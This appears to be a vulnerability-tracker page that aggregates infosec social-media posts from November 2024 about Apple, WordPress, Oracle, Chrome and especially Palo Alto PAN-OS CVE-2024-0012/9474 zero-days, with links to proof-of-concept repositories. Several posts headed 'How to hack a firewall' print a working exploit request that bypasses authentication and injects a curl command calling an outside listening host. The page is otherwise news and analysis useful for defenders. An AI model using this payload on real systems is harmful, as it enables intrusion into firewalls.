Apple pushed updates for 2 new zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore),
🐛 CVE-2024-44309 (WebKit):
- iOS and iPadOS 17.7.2
- iOS and iPadOS 18.1.1
- macOS Sequoia 15.1.1

#apple #cybersecurity #infosec #security #ios

##

CVE-2024-44625
(8.8 HIGH)

EPSS: 4.35%

updated 2024-11-20T16:44:13

1 posts

Gogs <=0.13.0 is vulnerable to Directory Traversal via the editFilePost function of internal/route/repo/editor.go.

1 repos

https://github.com/Fysac/CVE-2024-44625

fysac@infosec.exchange at 2024-11-14T03:43:43.000Z ##

Today I am publishing the technical details of CVE-2024-44625, an unpatched RCE vulnerability in Gogs: fysac.github.io/posts/2024/11/

##

CVE-2024-10924
(9.8 CRITICAL)

EPSS: 0.04%

updated 2024-11-20T15:30:50

3 posts

The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrat

7 repos

https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application

https://github.com/Trackflaw/CVE-2024-10924-Wordpress-Docker

https://github.com/MattJButler/CVE-2024-10924

https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-exploit

https://github.com/julesbsz/CVE-2024-10924

https://github.com/RandomRobbieBF/CVE-2024-10924

https://github.com/FoKiiin/CVE-2024-10924

threatcodex at 2024-11-19T15:29:25.209Z ##

4,000,000 WordPress Sites Using Really Simple Security Free and Pro Versions Affected by Critical Authentication Bypass Vulnerability

wordfence.com/blog/2024/11/rea

##

krlaboratories at 2024-11-18T16:31:29.210Z ##

MORE THAN 4 MILLION WORDPRESS SITES AT RISK

More than 4 million sites based on the WordPress CMS are at risk due to a critical vulnerability discovered by Wordfence Security specialists in the well-known Really Simple SSL plugin and its PRO version.

This is one of the most serious vulnerabilities in WordPress plugins in the last 12 years!

The threat was discovered on 6 November 2024, has the identifier CVE-2024-10924 and a criticality rating of 9.8 on the CVSS scale. The vulnerability allows an attacker to remotely gain access to any WordPress account, including Administrator, even when two-factor authentication is enabled!

On 12-14 November 2024, the Really Simple SSL development team released patched version 9.1.2 of both plugins, in which the vulnerability was completely eliminated.

A technical analysis of this vulnerability is published on the Wordfence site:
wordfence.com/blog/2024/11/rea

Conclusions:

- Try to use the minimum number of additional plugins on your WordPress site. The fewer plugins, the lower the risk of being compromised unnoticed.
- Do not use pirated, nulled, or cracked plugins.
- Regularly update WordPress and all of its components to the latest current versions. Do not put this off.
- Keep up with the latest cybersecurity news so that you learn about incidents in time and respond to them.
- Back up your sites so that you can recover in the event of a breach/attack.

If you know someone who uses these plugins on their site, we recommend sharing this advice with them to secure their site, since this vulnerability poses a significant risk.

If you need help, get in touch; we are at your service: kr-labs.com.ua/blog/wordpress-

##

CVE-2024-11395
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-20T00:32:14

5 posts

Type Confusion in V8 in Google Chrome prior to 131.0.6778.85 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

screaminggoat at 2024-11-19T19:06:32.994Z ##

Google Chrome security advisory: Stable Channel Update for Desktop
New Chrome version 131.0.6778.85/.86 for Windows, Mac and 131.0.6778.85 for Linux includes 3 security fixes, 1 externally reported: CVE-2024-11395 (high severity) Type Confusion in V8. No mention of exploitation.

##

ekis@mastodon.social at 2024-11-20T17:54:58.000Z ##

CVE-2024-11395
Type Confusion in V8 in Google Chrome prior to 131.0.6778.85 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

If you are security cautious might want to avoid using Chrome till this is fixed, if I understood it correctly. Feel free to correct me, I will be trying to build a PoC... in my lab

I just like saying '..in my lab'

##

CVE-2024-44309
(0 None)

EPSS: 0.04%

updated 2024-11-20T00:15:17.137000

28 posts

A cookie management issue was addressed with improved state management. This issue is fixed in Safari 18.1.1, iOS 17.7.2 and iPadOS 17.7.2, macOS Sequoia 15.1.1, iOS 18.1.1 and iPadOS 18.1.1, visionOS 2.1.1. Processing maliciously crafted web content may lead to a cross site scripting attack. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.

apfeltalk@creators.social at 2024-11-20T07:31:10.000Z ##

iOS 18.1.1 and macOS Sequoia 15.1.1 close actively exploited security vulnerabilities
Apple hat mit den neuen Updates iOS 18.1.1 und macOS Sequoia 15.1.1 bedeutende Sicherheitslücken geschlossen, die Beric
apfeltalk.de/magazin/feature/i
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit

##

jos1264@social.skynetcloud.site at 2024-11-19T21:25:03.000Z ##

Apple Confirms Zero-Day Attacks Hitting Intel-based Macs securityweek.com/apple-confirm #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple

##

threatcodex at 2024-11-20T17:27:16.977Z ##

Update now! Apple confirms vulnerabilities are already being exploited

malwarebytes.com/blog/news/202

##

screaminggoat at 2024-11-19T18:58:41.227Z ##

Apple exploited zero-days

Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n

##

AAKL at 2024-11-20T14:32:04.784Z ##

If you missed this yesterday, update your iPhone. This relates to CVE-2024-44308 and CVE-2024-44309.

Issues Emergency Security Update for Actively Exploited Vulnerabilities infosecurity-magazine.com/news

Apple security advisories: support.apple.com/en-us/100100

##

jos1264@social.skynetcloud.site at 2024-11-20T11:20:04.000Z ##

Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308) helpnetsecurity.com/2024/11/20 #Don'tmiss #Hotstuff #Google #0-day #Apple #macOS #News #iPad #iOS

##

applsec at 2024-11-19T22:04:28.058Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed additional updates for 2 zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- Safari 18.1.1

##

applsec at 2024-11-19T19:45:33.314Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed additional updates for 2 zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- visionOS 2.1.1

##

applsec at 2024-11-19T18:47:56.429Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed updates for 2 new zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore),
🐛 CVE-2024-44309 (WebKit):
- iOS and iPadOS 17.7.2
- iOS and iPadOS 18.1.1
- macOS Sequoia 15.1.1

##

CVE-2024-43450
(7.5 HIGH)

EPSS: 0.13%

updated 2024-11-19T20:49:26.017000

1 posts

Windows DNS Spoofing Vulnerability

screaminggoat@infosec.exchange at 2024-11-13T00:02:20.000Z ##

@ryanaraine tweeted "👀 Interesting people reporting a very interesting bug 👀" over at the Bad Place™ and linked CVE-2024-43450 (7.5 high) Windows DNS Spoofing Vulnerability. The reporters are from "cnnic.cn" which is China Internet Network Information Center, affiliated with the Ministry of Industry and Information Technology.

I think he's implying that it's unusual for a PRC government institution affiliated with MIIT itself to report a widely impacting network vulnerability in a post-July 2021 “Regulations on the Management of Network Product Security Vulnerabilities” (RMSV). Maybe the attack complexity is too high to be worthwhile? CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C

##

CVE-2024-0793
(7.7 HIGH)

EPSS: 0.12%

updated 2024-11-19T20:25:31

4 posts

A flaw was found in kube-controller-manager. This issue occurs when the initial application of a HPA config YAML lacking a .spec.behavior.scaleUp block causes a denial of service due to KCM pods going into restart churn.

CVE-2024-21287
(7.5 HIGH)

EPSS: 0.09%

updated 2024-11-19T18:31:00

7 posts

Vulnerability in the Oracle Agile PLM Framework product of Oracle Supply Chain (component: Software Development Kit, Process Extension). The supported version that is affected is 9.3.6. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Agile PLM Framework. Successful attacks of this vulnerability can result in unauthorized access

screaminggoat at 2024-11-19T20:07:58.374Z ##

Oracle exploited zero-day: Security Alert CVE-2024-21287 Released

  • CVE-2024-21287 (7.5 high) Vulnerability in the Oracle Agile PLM Framework product of Oracle Supply Chain (component: Software Development Kit, Process Extension). The supported version that is affected is 9.3.6. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Agile PLM Framework. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Agile PLM Framework accessible data.

It was reported as being actively exploited "in the wild" by CrowdStrike.

Oracle's actual security advisory Oracle Security Alert Advisory - CVE-2024-21287 is useless because it doesn't mention exploitation.

h/t: @lawrenceabrams See Bleeping Computer reporting: Oracle warns of Agile PLM file disclosure flaw exploited in attacks
cc: @campuscodi @mttaggart @cR0w @ntkramer @iagox86 @dreadpir8robots @catc0n @harrysintonen @neurovagrant etc.

##

jbhall56 at 2024-11-20T13:40:51.566Z ##

Tracked as CVE-2024-21287 (CVSS score of 7.5), the zero-day affects Agile PLM version 9.3.6 and can be exploited remotely without authentication. securityweek.com/oracle-patche

##

oversecurity@mastodon.social at 2024-11-19T20:10:06.000Z ##

Oracle warns of Agile PLM file disclosure flaw exploited in attacks

Oracle has fixed an unauthenticated file disclosure flaw in Oracle Agile Product Lifecycle Management (PLM) tracked as CVE-2024-21287, which was...

🔗️ [Bleepingcomputer] link.is.it/7jwrwy

##

jos1264@social.skynetcloud.site at 2024-11-19T11:40:03.000Z ##

Oracle patches exploited Agile PLM vulnerability (CVE-2024-21287) helpnetsecurity.com/2024/11/19 #productdevelopment #CrowdStrike #enterprise #Don'tmiss #Hotstuff #Tenable #Oracle #News

##

CVE-2024-52867
(8.2 HIGH)

EPSS: 0.04%

updated 2024-11-19T18:30:58

4 posts

guix-daemon in GNU Guix before 5ab3c4c allows privilege escalation because build outputs are accessible by local users before file metadata concerns (e.g., for setuid and setgid programs) are properly addressed. The vulnerability can be remediated within the product via certain pull, reconfigure, and restart actions. Both 5ab3c4c and 5582241 are needed to resolve the vulnerability.

CVE-2024-0012
(9.8 CRITICAL)

EPSS: 96.61%

updated 2024-11-19T17:17:29.723000

57 posts

An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474 https://security.paloaltonetworks.com/CVE-2024-9474 .

Nuclei template

4 repos

https://github.com/hazesecurity/CVE-2024-0012

https://github.com/watchtowrlabs/palo-alto-panos-cve-2024-0012

https://github.com/Sachinart/CVE-2024-0012-POC

https://github.com/greaselovely/CVE-2024-0012

oots at 2024-11-19T20:32:29.395Z ##

How to hack a firewall:

POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1

labs.watchtowr.com/pots-and-pa

##

jos1264@social.skynetcloud.site at 2024-11-18T17:20:03.000Z ##

Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited thecyberexpress.com/palo-alto- #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS

##

screaminggoat at 2024-11-19T15:48:04.095Z ##

watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request, which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.

##

threatcodex at 2024-11-19T14:28:46.687Z ##

Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474

labs.watchtowr.com/pots-and-pa

##

screaminggoat at 2024-11-18T19:18:33.674Z ##

CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!

  • CVE-2024-0012 (CVSSv4: 9.3 critical) Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
  • CVE-2024-9474 (CVSSv4: 6.9 medium) Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
  • CVE-2024-1212 (perfect 10.0 🥳) Progress Kemp LoadMaster OS Command Injection Vulnerability

##

screaminggoat at 2024-11-18T15:31:42.026Z ##

Unit 42: Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.

h/t: @cR0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares

##

screaminggoat at 2024-11-18T14:29:10.181Z ##

Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)

The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474

Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.

New Indicators of compromise at Unit 42: unit42.paloaltonetworks.com/cv

##

screaminggoat@infosec.exchange at 2024-11-19T15:48:04.000Z ##

watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.

#CVE_2024_0012 #CVE_2024_9474 #eitw #activeexploitation #vulnerability #zeroday #paloaltonetworks #panos #rootcauseanalysis #infosec #cybersecurity

##

screaminggoat@infosec.exchange at 2024-11-18T19:18:33.000Z ##

CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!

  • CVE-2024-0012 (CVSSv4: 9.3 critical) Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
  • CVE-2024-9474 (CVSSv4: 6.9 medium) Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
  • CVE-2024-1212 (perfect 10.0 🥳) Progress Kemp LoadMaster OS Command Injection Vulnerability

#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster

##

screaminggoat@infosec.exchange at 2024-11-18T15:31:42.000Z ##

Unit 42: Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.

h/t: cr0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares

#CVE_2024_0012 #CVE_2024_9474 #threatintel #infosec #cybersecurity #cyberthreatintelligence #OperationLunarPeek #LunarPeek #infosec #CTI #IOC

##

screaminggoat@infosec.exchange at 2024-11-18T14:29:10.000Z ##

Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)

The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474

Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.

New Indicators of compromise at Unit 42: unit42.paloaltonetworks.com/cv

#paloaltonetworks #zeroday #vulnerability #pan #CVE_2024_9474 #CVE_2024_0012 #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec #IOC

##

AAKL at 2024-11-20T16:16:25.592Z ##

Unit 42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 unit42.paloaltonetworks.com/cv

##

571906@ap.podcastindex.org at 2024-11-20T02:45:06.000Z ##

New Episode: ISC StormCast for Wednesday, November 20th, 2024

Shownotes:
Detecting the Presence of a Debugger in Linux
https://isc.sans.edu/diary/Detecting%20the%20Presence%20of%20a%20Debugger%20in%20Linux/31450
Palo Alto Patches
https://security.paloaltonetworks.com/CVE-2024-0012
https://security.paloalt

AntennaPod | Anytime Player | Apple Podcasts | Castamatic | CurioCaster | Fountain | gPodder | Overcast | Pocket Casts | Podcast Addict | Podcast Guru | Podnews | Podverse | Truefans

Or Listen right here.

##

patchnow24x7 at 2024-11-20T08:44:30.302Z ##

Updates on PAN-SA-2024-0015: The blog has been updated with the following latest information provided by Palo Alto.

1) CVE-2024-0012 has been assigned
2) Indicators of Compromise have been updated.
3) Added a section "What if I found one of the IOCs in my Organization's environment??"
4) Affected Products and Product versions have been updated
5) Fixed versions have been updated.

Refer: patchnow24x7.com/blog-1/f/pan-

##

chris@mas.todon.rocks at 2024-11-20T08:27:11.000Z ##

r u freakin' kidding me? "X-PAN-AUTHCHECK: off" - seriously?!

labs.watchtowr.com/pots-and-pa

##

iagox86 at 2024-11-19T18:22:11.850Z ##

Favorite quote from WatchTowr's blog about PAN-OS vuln:

I guess auto_prepend_file actually has legitimate use besides writing PHP exploits.

labs.watchtowr.com/pots-and-pa

##

mttaggart at 2024-11-19T16:13:30.453Z ##

Reading the awesome WatchTowr writeup of CVE-2024-0012 and CVE-2024-9474, the Palo Alto RCE/privesc one-two punch. Great work here as always. And h/t to @screaminggoat , of course.

labs.watchtowr.com/pots-and-pa

A few things stand out:

First, sorry @cR0w, no #directorytraversalmemes for you:

We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?! At this point, why is anyone surprised?

That’s right folks, a simple reproducer for CVE-2024-0012. It couldn't be easier than that.

That's the auth bypass. And then, WHAT IS THIS DOING IN ANYTHING

return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $username");

So obviously if that $username has shell metacharacters, you have yourself a nice command injection.

And guess what user the service runs as?

##

AAKL@infosec.exchange at 2024-11-20T16:16:25.000Z ##

#PaloAlto Unit 42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 unit42.paloaltonetworks.com/cv #cybersecurity #Infosec

##

patchnow24x7@infosec.exchange at 2024-11-20T08:44:30.000Z ##

Updates on PAN-SA-2024-0015: The blog has been updated with the following latest information provided by Palo Alto.

1) CVE-2024-0012 has been assigned
2) Indicators of Compromise have been updated.
3) Added a section "What if I found one of the IOCs in my Organization's environment??"
4) Affected Products and Product versions have been updated
5) Fixed versions have been updated.

Refer: patchnow24x7.com/blog-1/f/pan-

#PatchNOW
#Vulnerability
#ComputerSecurity
#hacked
#Cyberattack
#infosec
#informationsecurity
#CyberSecurityAwareness
#DataBreach
#cybersecurity

##

chris@mas.todon.rocks at 2024-11-20T08:27:11.000Z ##

r u freakin' kidding me? "X-PAN-AUTHCHECK: off" - seriously?!

labs.watchtowr.com/pots-and-pa

##

iagox86@infosec.exchange at 2024-11-19T18:22:11.000Z ##

Favorite quote from WatchTowr's blog about PAN-OS vuln:

I guess auto_prepend_file actually has legitimate use besides writing PHP exploits.

labs.watchtowr.com/pots-and-pa

##

mttaggart@infosec.exchange at 2024-11-19T16:13:30.000Z ##

Reading the awesome WatchTowr writeup of CVE-2024-0012 and CVE-2024-9474, the Palo Alto RCE/privesc one-two punch. Great work here as always. And h/t to @screaminggoat , of course.

labs.watchtowr.com/pots-and-pa

A few things stand out:

First, sorry @cR0w, no #directorytraversalmemes for you:

We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?! At this point, why is anyone surprised?

That’s right folks, a simple reproducer for CVE-2024-0012. It couldn't be easier than that.

That's the auth bypass. And then, WHAT IS THIS DOING IN ANYTHING

return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $username");

So obviously if that $username has shell metacharacters, you have yourself a nice command injection.

And guess what user the service runs as?

##

AAKL@infosec.exchange at 2024-11-19T15:17:42.000Z ##

WatchTower: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 labs.watchtowr.com/pots-and-pa #cybersecurity #infosec #PaloAlto

##

AAKL@infosec.exchange at 2024-11-19T14:00:31.000Z ##

If you missed this, #PaloAlto has patched a Firewall Zero-Day Exploited in Operation Lunar Peek securityweek.com/palo-alto-pat @SecurityWeek @ekovacs

More:

Palo Alto Unit 42 posted this yesterday about Lunar Peek activity related to CVE-2024-0012: unit42.paloaltonetworks.com/cv

##

ljrk@todon.eu at 2024-11-19T11:30:19.000Z ##

@christopherkunz Palo Alto keeps on giving.

labs.watchtowr.com/pots-and-pa

##

adulau@infosec.exchange at 2024-11-19T11:19:38.000Z ##

Curious about CVE-2024-0012 - PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)

The overall sighting gives a good timeline of activities concerning the vulnerability.

🔗 vulnerability.circl.lu/vuln/CV

#infosec #opensource #cybersecurity #vulnerability #paloalto

##

GossiTheDog@cyberplace.social at 2024-11-19T11:07:22.000Z ##

Weeeeeee

I don’t know why Palo-Alto changed the CVEs at the last minute to remove reference to RCE. It’s remote code execution. labs.watchtowr.com/pots-and-pa

##

_r_netsec@infosec.exchange at 2024-11-19T09:43:06.000Z ##

Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 - watchTowr Labs labs.watchtowr.com/pots-and-pa

##

oversecurity@mastodon.social at 2024-11-19T09:10:08.000Z ##

CISA Adds Three Critical Vulnerabilities to the Known Exploited Vulnerabilities Catalog

CISA adds CVE-2024-1212, CVE-2024-0012, and CVE-2024-9474 to the Known Exploited Vulnerabilities Catalog (KEV).

🔗️ [Cyble] link.is.it/so5jib

##

res260@infosec.exchange at 2024-11-19T01:25:02.000Z ##

The way Palo Alto Networks has handled information disclosure regarding CVE-2024-0012 has been terrible 😬

#paloaltonetworks

##

screaminggoat@infosec.exchange at 2024-11-18T22:03:01.000Z ##

@catc0n I noticed the disparity between the CVE-2024-9474 advisory description "privilege escalation vulnerability" and CISA's KEV Catalog name "Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability"

Palo Alto Networks discarded the verbiage from Thursday "unauthenticated remote command execution vulnerability" and divided the unauth RCE into 2 separate vulnerabilities, while stating that one would allow for the other.

So authentication bypass to admin (CVE-2024-0012), then authenticated privesc from admin to root (CVE-2024-9474).

Unit 42 skipped talking about CVE-2024-9474.

The CVSSv4 vector is CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:A/AU:N/R:U/V:C/RE:H/U:Red I think the real takeaway is that only Integrity is impacted. Everything else appears to be the consequence of having root privileges on a firewall

##

screaminggoat@infosec.exchange at 2024-11-18T21:03:07.000Z ##

@shadowserver IOCs provided by Unit 42: unit42.paloaltonetworks.com/cv

CVEs were added to CISA's KEV Catalog: cisa.gov/news-events/alerts/20

##

AAKL@infosec.exchange at 2024-11-18T20:25:29.000Z ##

#CISA has updated the KEV catalogue:

- CVE-2024-1212: Progress Kemp LoadMaster OS Command Injection Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2024-0012: Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2024-9474: Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability cve.org/CVERecord?id=CVE-2024- @cisacyber #cybersecurity #infosec #PaloAlto

##

cisakevtracker@mastodon.social at 2024-11-18T20:01:06.000Z ##

CVE ID: CVE-2024-0012
Vendor: Palo Alto Networks
Product: PAN-OS
Date Added: 2024-11-18
Vulnerability: Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
Notes: security.paloaltonetworks.com/ ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

AAKL@infosec.exchange at 2024-11-18T16:27:18.000Z ##

#PaloAlto has updated its security advisories: security.paloaltonetworks.com/

- CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface security.paloaltonetworks.com/

- CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface @paloaltontwks #cybersecurity #infosec

##

jos1264@social.skynetcloud.site at 2024-11-18T16:20:02.000Z ##

Attackers are exploiting 2 zero-days in Palo Alto Networks firewalls (CVE-2024-0012, CVE-2024-9474) helpnetsecurity.com/2024/11/18 #PaloAltoNetworks #enterprise #Don'tmiss #Hotstuff #firewall #0-day #News #CVE

##

zeljkazorz@infosec.exchange at 2024-11-18T16:06:38.000Z ##

Palo Alto Networks has released fixes for two vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in its next-generation firewalls that have been exploited by attackers as zero-days.

CVE-2024-0012 is the (previously unspecified) unauthenticated remote command execution zero-day that the company started warning about ten days ago.

helpnetsecurity.com/2024/11/18

#CVE #Cybersecurity

##

cR0w@infosec.exchange at 2024-11-18T15:30:09.000Z ##

@screaminggoat "Palo Alto Networks and Unit 42 are engaged in tracking a limited set of exploitation activity related to CVE-2024-0012 and are working with external researchers, partners, and customers to share information transparently and rapidly." 🤔

unit42.paloaltonetworks.com/cv

##

AAKL@infosec.exchange at 2024-11-18T15:12:39.000Z ##

Palo Alto Unit42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 unit42.paloaltonetworks.com/cv @unit42_intel #cybersecurity #infosec

##

screaminggoat@infosec.exchange at 2024-11-18T14:57:27.000Z ##

@neurovagrant start your Monday off with exploited zero-days:

##

screaminggoat@infosec.exchange at 2024-11-18T14:49:21.000Z ##

@therecord_media @jwarminsky @jgreig can this news article be updated to include the two CVE IDs?: CVE-2024-0012 and CVE-2024-9474

##

cR0w@infosec.exchange at 2024-11-18T13:52:56.000Z ##

Huh. So PAN apparently released sigs to cover a critical vuln in the PAN-OS web management interface. Could this finally be it? They list it as CVE-2024-0012 and link to the advisory.

Well, the link is broken, but maybe it's just not published yet: security.paloaltonetworks.com/

Let's take a look at that CVE on cve.org: cve.org/CVERecord?id=CVE-2024-

Oh, still says reserved. Maybe they meant their own advisory number of PAN-SA-2024-0012: security.paloaltonetworks.com/

No, that doesn't make sense. That's about a bunch of OSS CVEs that are not even confirmed to be impacting PAN-OS.

So here we are once again with PAN using lots of words to say nothing. *sigh*

I need more coffee.

##

CVE-2024-9474
(7.2 HIGH)

EPSS: 97.40%

updated 2024-11-19T17:16:40.513000

51 posts

A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges. Cloud NGFW and Prisma Access are not impacted by this vulnerability.

Nuclei template

3 repos

https://github.com/Chocapikk/CVE-2024-9474

https://github.com/hazesecurity/CVE-2024-9474

https://github.com/k4nfr3/CVE-2024-9474

oots at 2024-11-19T20:32:29.395Z ##

How to hack a firewall:

POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1

labs.watchtowr.com/pots-and-pa

##

jos1264@social.skynetcloud.site at 2024-11-18T17:20:03.000Z ##

Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited thecyberexpress.com/palo-alto- #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS

##

oots@infosec.exchange at 2024-11-19T20:32:29.000Z ##

How to hack a #PaloAlto firewall:

POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
